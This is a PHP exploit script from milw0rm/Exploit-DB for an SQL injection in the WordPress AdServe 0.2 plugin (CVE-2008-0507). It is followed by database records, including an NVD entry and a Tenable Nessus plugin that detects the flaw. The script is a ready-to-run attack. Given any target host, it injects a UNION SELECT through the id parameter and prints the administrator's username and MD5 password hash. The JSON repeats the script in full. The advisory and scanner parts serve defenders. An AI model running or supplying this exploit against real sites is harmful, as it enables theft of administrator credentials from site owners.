<?
# WordPress Adserve plugin v 0.2 Sql Injection Exploit
#
# Plugin Homepage-http://www.irisco.it/?page_id=40
#
# Found by:enter_the_dragon
#
# Vuln code
#
# -In adclick.php
#
# if (isset($_GET['id'])) {
# Header("Location: ".iri_AdServe_BannerClick($_GET['id'])
#
# -In iri_AdServe_BannerClick function
#
# return $wpdb->get_var("SELECT url FROM $table_name WHERE id=$id;");
#
#
#
# Exploit
#
# id variable isnt filtered so we can inject and check the output in the Location response-header
# If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved
#
#
echo "\n";
echo "-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------"."\n";
echo "-------------------coded by : enter_the_dragon--------------------"."\n";
echo "------------------------------------------------------------------"."\n";
if ($argc!=3)
{
echo " Usage: $argv[0] target_host wp_path \n";
echo " target_host: Your target ex www.target.com \n";
echo " wp_path: WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
echo "\n";
exit;
}
$query=$argv[1];
$query.=$argv[2];
$query.="wp-content/plugins/wp-adserve/adclick.php?";
$query.="id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";
if(function_exists(curl_init))
{
$ch = curl_init("http://$query");
curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$html=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if($returncode==302)
{
$pattern="/\|(.*)?\|([a-z0-9]{32})\|/";
if(preg_match($pattern,$html,$matches))
{
$adminusername=$matches[1];
$adminpass=$matches[2];
echo "Admin Login:$adminusername\n" ;
echo "Admin Pass :$adminpass\n";
}
}
else
{
exit ("Exploit Failed :( \n");
}
}
else
exit("Error:Libcurl isnt installed \n");
?>
# milw0rm.com [2008-01-30]
{"hash": "ae3fef80a9cc34ae55809162dc058c3ba8da44c62b2294d1f68a619924a07f97", "edition": 1, "lastseen": "2016-01-31T21:17:47", "viewCount": 112, "bulletinFamily": "exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "history": [], "id": "EDB-ID:5013", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/5013/", "description": "Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit. CVE-2008-0507. Webapps exploit for php platform", "title": "WordPress Plugin Adserve 0.2 - adclick.php SQL Injection Exploit", "sourceData": "<?\n# WordPress Adserve plugin v 0.2 Sql Injection Exploit \n#\n# Plugin Homepage-http://www.irisco.it/?page_id=40\n# \t\n# Found by:enter_the_dragon\n# \n\n# Vuln code\n#\n# -In adclick.php\n#\n# if (isset($_GET['id'])) {\n# Header(\"Location: \".iri_AdServe_BannerClick($_GET['id'])\n#\t\n# -In iri_AdServe_BannerClick function\n# \n# \treturn $wpdb->get_var(\"SELECT url FROM $table_name WHERE id=$id;\"); \n#\n#\n# \n\n# Exploit\n# \n# id variable isnt filtered so we can inject and check the output in the Location response-header \n# If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved\n#\n# \n\n\n\n\necho \"\\n\";\necho \"-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------\".\"\\n\";\necho \"-------------------coded by : enter_the_dragon--------------------\".\"\\n\";\necho \"------------------------------------------------------------------\".\"\\n\";\nif ($argc!=3)\n{\necho \" Usage:\t$argv[0] target_host wp_path \\n\";\necho \" target_host:\tYour target ex www.target.com \\n\";\necho \" wp_path:\tWordPress path ex /blog/ or / if wordpress is installed in the web servers root folder\";\t \necho \"\\n\";\nexit;\n}\n\n\n$query=$argv[1];\n$query.=$argv[2];\n$query.=\"wp-content/plugins/wp-adserve/adclick.php?\";\n$query.=\"id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users\";\n\n \nif(function_exists(curl_init))\n{\n $ch = curl_init(\"http://$query\");\n curl_setopt($ch, CURLOPT_HEADER,true);\n curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);\n curl_setopt($ch, CURLOPT_TIMEOUT,10);\n curl_setopt($ch, CURLOPT_USERAGENT, \"Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)\"); \n $html=curl_exec($ch);\n $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);\n curl_close($ch);\n\n if($returncode==302)\n { \n\t$pattern=\"/\\|(.*)?\\|([a-z0-9]{32})\\|/\";\n if(preg_match($pattern,$html,$matches))\n {\n $adminusername=$matches[1];\n $adminpass=$matches[2];\n\t echo \"Admin Login:$adminusername\\n\" ;\n \t echo \"Admin Pass :$adminpass\\n\";\t \n\t }\n }\t\t \n\telse \n {\n\texit (\"Exploit Failed :( \\n\");\n }\t\n\n\n}\nelse\nexit(\"Error:Libcurl isnt installed \\n\");\n\n?>\n\n# milw0rm.com [2008-01-30]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-0507"], "published": "2008-01-30T00:00:00", "osvdbidlist": ["40779"], "references": [], "reporter": "enter_the_dragon", "modified": "2008-01-30T00:00:00", "href": "https://www.exploit-db.com/exploits/5013/"}
{"cve": [{"lastseen": "2017-09-29T14:25:44", "references": ["http://www.vupen.com/english/advisories/2008/0364", "https://exchange.xforce.ibmcloud.com/vulnerabilities/40045", "http://www.securityfocus.com/bid/27504", "https://www.exploit-db.com/exploits/5013"], "description": "SQL injection vulnerability in adclick.php in the AdServe 0.2 plugin for WordPress allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 3, "reporter": "NVD", "published": "2008-01-31T15:00:00", "title": "CVE-2008-0507", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:25:44", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-0507"], "scanner": [], "modified": "2017-09-28T21:30:18", "cpe": ["cpe:/a:wordpress:adserve:0.2"], "id": "CVE-2008-0507", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0507", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:40:06", "references": ["https://wordpress.org/plugins/adserve/other_notes/"], "pluginID": "30129", "description": "The remote host is running AdServe, a third-party ad banner plugin for WordPress.\n\nThe version of AdServe installed on the remote host fails to sanitize input to the 'id' parameter of the 'adclick.php' script before using it in a database query. Regardless of PHP's 'magic_quotes_gpc' setting, an attacker may be able to exploit this issue to manipulate database queries, leading to disclosure of sensitive information, modification of data, or attacks against the underlying database.", "edition": 6, "reporter": "Tenable", "published": "2008-01-30T00:00:00", "title": "WordPress AdServe 'adclick.php' 'id' Parameter SQL Injection", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0507"], "modified": "2018-08-07T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_ADSERVE_ID_SQL_INJECTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=30129", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(30129);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/08/07 16:46:49\");\n\n script_cve_id(\"CVE-2008-0507\");\n script_bugtraq_id(27504);\n script_xref(name:\"EDB-ID\", value:\"5013\");\n\n script_name(english:\"WordPress AdServe 'adclick.php' 'id' Parameter SQL Injection\");\n script_summary(english:\"Attempts to generate a SQL syntax error.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is affected by a SQL\ninjection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running AdServe, a third-party ad banner plugin for\nWordPress.\n\nThe version of AdServe installed on the remote host fails to sanitize\ninput to the 'id' parameter of the 'adclick.php' script before using\nit in a database query. Regardless of PHP's 'magic_quotes_gpc'\nsetting, an attacker may be able to exploit this issue to manipulate\ndatabase queries, leading to disclosure of sensitive information,\nmodification of data, or attacks against the underlying database.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/adserve/other_notes/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 0.3 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/WordPress\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = 'AdServe';\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n regexes = make_list();\n regexes[0] = make_list('AdServe is the advertising server for WordPress');\n checks[\"/wp-content/plugins/wp-adserve/readme.txt\"] = regexes;\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue to control the redirect.\nmagic = rand();\nexploit = \"-1 UNION SELECT \" + magic;\n\nw = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"/wp-content/plugins/wp-adserve/adclick.php?id=\" +\n urlencode(str:exploit),\n exit_on_fail : TRUE\n);\n\n# There's a problem if...\nheaders = w[1];\nres = strcat(w[0], w[1], '\\r\\n', w[2]);\nif (\n # we either see an error involving our exploit or...\n \" clicks=clicks+1 WHERE id=\" + exploit >< res ||\n # we see a redirect to our magic.\n egrep(pattern:\"^Location: +\" + magic, string:headers)\n)\n{\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n security_hole(port);\n exit(0);\n}\naudit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
